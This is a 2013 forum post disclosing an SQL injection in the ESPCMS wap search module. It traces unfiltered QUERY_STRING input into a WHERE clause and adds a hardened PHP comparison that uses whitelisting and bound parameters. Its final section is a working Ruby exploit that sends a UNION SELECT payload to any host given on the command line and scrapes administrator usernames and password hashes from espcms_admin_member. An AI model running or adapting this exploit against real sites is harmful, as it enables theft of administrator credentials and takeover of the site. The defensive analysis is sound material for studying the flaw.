中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: SQL injection in the search of the espcms wap module
Author: admin
Time: 2013-7-27 18:31
0x0 Vulnerability overview
0x1 Vulnerability details
0x2 PoC
0x0 Vulnerability overview
ESPCMS (易思 ESPCMS Enterprise Website Management System) is an enterprise website management system built on the LAMP stack. It is simple to operate, feature-rich, stable, extensible and secure, and easy to customize and maintain, so it can help you build a powerful, professional corporate website quickly and easily.

Its handling of incoming parameters is not rigorous, which leads to SQL injection.
0x1 Vulnerability details
The tainted variable flows as $_SERVER['QUERY_STRING'] -> $urlcode -> $output -> $value -> $db_where -> $sql -> mysql_query, and nothing along this path filters it, which is what makes the injection possible.

Because the variable is read from $_SERVER['QUERY_STRING'], it sidesteps the program's own input filtering entirely.

Furthermore, the injected variable is an array value rather than an array key, so it is not filtered either. Together these two conditions produce a fairly unusual SQL injection.

In the in_result function of /interface/3gwap_search.php:
```php
function in_result() {
    ... ... ... ... ... ... ... ... ...
    // The raw query string is parsed again here, bypassing the filtering applied to $_GET
    $urlcode = $_SERVER['QUERY_STRING'];
    parse_str(html_entity_decode($urlcode), $output);
    ... ... ... ... ... ... ... ... ...
    if (is_array($output['attr']) && count($output['attr']) > 0) {
        $db_table = db_prefix . 'model_att';
        foreach ($output['attr'] as $key => $value) {
            if ($value) {
                // Only the array key is escaped and trimmed
                $key = addslashes($key);
                $key = $this->fun->inputcodetrim($key);
                $db_att_where = " WHERE isclass=1 AND attrname='$key'";
                $countnum = $this->db_numrows($db_table, $db_att_where);
                if ($countnum > 0) {
                    // $value is concatenated into the WHERE clause unfiltered
                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'';
                }
            }
        }
    }
    if (!empty($keyword) && empty($keyname)) {
        $keyname = 'title';
        $db_where .= " AND a.title like '%$keyword%'";
    } elseif (!empty($keyword) && !empty($keyname)) {
        $db_where .= " AND $keyname like '%$keyword%'";
    }
    $pagemax = 15;
    $pagesylte = 1;
    if ($countnum > 0) {
        $numpage = ceil($countnum / $pagemax);
    } else {
        $numpage = 1;
    }
    $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
    $this->htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON['file_fileex'], 5, $this->lng['pagebotton'], $this->lng['gopageurl'], 0);
    $sql = $this->htmlpage->PageSQL('a.did', 'down');
    $rs = $this->db->query($sql);
    ... ... ... ... ... ... ... ... ...
}
```
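As an added example (not ESPCMS code), the attr[] loop from in_result() is shown below as the page describes it and next to a hardened version that whitelists the attribute name and binds the value as a parameter. The model_att lookup is replaced by a constructed closure, and the hardened WHERE clause is assumed to be executed through a prepared statement.

```php
<?php
// Added example, not ESPCMS code. $attrExists stands in for the db_numrows() lookup
// against model_att; the whitelist below is constructed for the demonstration.

function attrWhereVulnerable(array $attr, callable $attrExists): string {
    $dbWhere = '';
    foreach ($attr as $key => $value) {
        if ($value) {
            $key = addslashes($key);               // only the KEY is escaped ...
            if ($attrExists($key)) {
                $dbWhere .= ' AND b.' . $key . '=\'' . $value . '\'';   // ... the VALUE is not
            }
        }
    }
    return $dbWhere;
}

function attrWhereHardened(array $attr, callable $attrExists): array {
    $dbWhere = '';
    $params  = [];
    foreach ($attr as $key => $value) {
        if (!is_string($value) || $value === '') {
            continue;                              // nested arrays and empty values are ignored
        }
        // The column name must be a plain identifier AND a known attribute (whitelist, not escaping).
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', (string) $key) || !$attrExists((string) $key)) {
            continue;
        }
        $dbWhere .= ' AND b.`' . $key . '` = ?';
        $params[] = $value;                        // bound later via PDOStatement::execute($params)
    }
    return [$dbWhere, $params];
}

// Constructed stand-in for the model_att lookup: only 'jobnum' is a real attribute here.
$attrExists = fn(string $name): bool => in_array($name, ['jobnum'], true);

// Same shape as the page's payload after parse_str(): attr[jobnum] => "1' and 1=2 UNION ..."
parse_str("attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201", $output);

// Vulnerable: the attacker-controlled value becomes part of the SQL text.
echo attrWhereVulnerable($output['attr'], $attrExists), PHP_EOL;

// Hardened: the SQL text contains only the whitelisted column and a placeholder;
// the payload travels separately as a bound parameter.
[$where, $params] = attrWhereHardened($output['attr'], $attrExists);
echo $where, PHP_EOL;
echo json_encode($params), PHP_EOL;
```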
0x2 PoC
```ruby
require "net/http"

# Send a plain GET request to the given URL and return the response
def request(method, url)
  if method.eql?("get")
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    response = http.request(Net::HTTP::Get.new(uri.request_uri))
    return response
  end
end

doc = <<HERE
-------------------------------------------------------
Espcms Injection Exploit
Author:ztz
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage = <<HERE
Usage: ruby #{$0} host port path
example: ruby #{$0} www.target.com 80 /
HERE

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]

  puts "\nsend request..."
  url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&" \
        "attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13" \
        ",14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27" \
        ",28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
  response = request("get", url)
  # Pick "username&hash" pairs out of the page body
  result = response.body.scan(/\w+&\w{32}/)
  puts result
end
```
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)